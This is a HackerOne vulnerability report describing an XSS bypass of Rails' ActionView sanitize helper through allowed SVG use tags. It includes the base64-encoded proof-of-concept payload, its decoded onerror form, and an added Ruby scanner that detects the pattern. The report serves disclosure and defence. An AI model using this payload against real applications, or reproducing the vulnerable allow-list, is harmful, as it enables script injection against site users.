HackerOne report H1:1694173 (haqpl)
History: Sep 07, 2022 - 9:38 p.m.

Ruby on Rails: ActionView sanitize helper bypass leading to XSS using SVG tag.

2022-09-07 21:38:41
haqpl
hackerone.com
6

CVSS3: 6.1 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS2: 5.8 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N

EPSS: 0.001 Low (percentile 18.1%)

In a specific configuration, it was possible to bypass HTML sanitization by using the use tag of the SVG element.

In index.html.erb:

<%= sanitize "<svg><use href=\"data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEzMzcnIGhlaWdodD0nMTMzNyc+CjxpbWFnZSBocmVmPSIxIiBvbmVycm9yPSJhbGVydCh3aW5kb3cub3JpZ2luKSIgLz4KPC9zdmc+#x\"/></svg>", tags: %w(svg use) %>

The use tag allows embedding another, base64-encoded SVG that carries the actual XSS payload. The base64 after decoding:

<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='1337' height='1337'>
<image href="1" onerror="alert(window.origin)" />
</svg>

The svg and use tags had to be allowed, either in the global configuration (config.action_view.sanitized_allowed_tags = ['svg', 'use']) or inline via the tags argument of the helper.
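As an added defensive check (example code, not part of the report or of Rails), the following plain-Ruby scanner flags the pattern the report relies on: a use element whose href points at a data: URI, decodes the embedded document and reports any on* event-handler attributes inside it. The sample input is constructed here from the decoded SVG shown above; the function and constant names are the example's own.

```ruby
# Detect SVG <use> elements that reference a data: URI, the vector used in
# the report. No gems are required: base64 decoding uses String#unpack1.

# Matches <use ... href="data:..."> or xlink:href, capturing the URI body.
USE_DATA_HREF = /<use\b[^>]*\b(?:xlink:)?href\s*=\s*["']?\s*data:([^"'>\s]+)/i

# Decode the body of a data: URI (base64 or percent-encoded) into text.
def decode_data_uri(uri_body)
  meta, _, data = uri_body.partition(",")
  data = data.sub(/#.*\z/, "")           # drop a fragment such as "#x"
  if meta.split(";").include?("base64")
    data.unpack1("m")                    # lenient base64 decode
  else
    data.gsub(/%([0-9a-f]{2})/i) { $1.hex.chr }
  end
end

# Return one finding per data: <use> in a fragment of user-supplied markup:
# whether the decoded body is itself an SVG document and which event-handler
# attributes (onerror, onload, ...) it carries.
def scan_svg_use(html)
  html.scan(USE_DATA_HREF).map do |(body)|
    decoded  = decode_data_uri(body)
    handlers = decoded.scan(/\bon[a-z]+(?=\s*=)/i).map(&:downcase).uniq
    { embedded_svg: decoded.include?("<svg"), event_handlers: handlers }
  end
end

# Constructed sample: the decoded SVG from the report, re-encoded into the
# same data: URI shape and wrapped in the allowed svg/use tags.
INNER_SVG = "<svg id='x' xmlns='http://www.w3.org/2000/svg' " \
            "xmlns:xlink='http://www.w3.org/1999/xlink'>" \
            "<image href=\"1\" onerror=\"alert(window.origin)\" /></svg>"
SAMPLE = "<svg><use href=\"data:image/svg+xml;base64," \
         "#{[INNER_SVG].pack('m0')}#x\"/></svg>"

if __FILE__ == $PROGRAM_NAME
  scan_svg_use(SAMPLE).each do |f|
    puts "data: <use> found; embedded svg=#{f[:embedded_svg]} " \
         "handlers=#{f[:event_handlers].inspect}"
  end
end
```

A sanitizer allow-list that includes use should be treated as a finding on its own; this scanner is for reviewing stored content or logs where such a list was already in effect.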

Impact

XSS could lead to data theft through the attacker’s ability to manipulate data through their access to the application, and their ability to interact with other users, including performing other malicious attacks, which would appear to originate from a legitimate user. These malicious actions could also result in reputational damage for the business through the impact on customers’ trust.
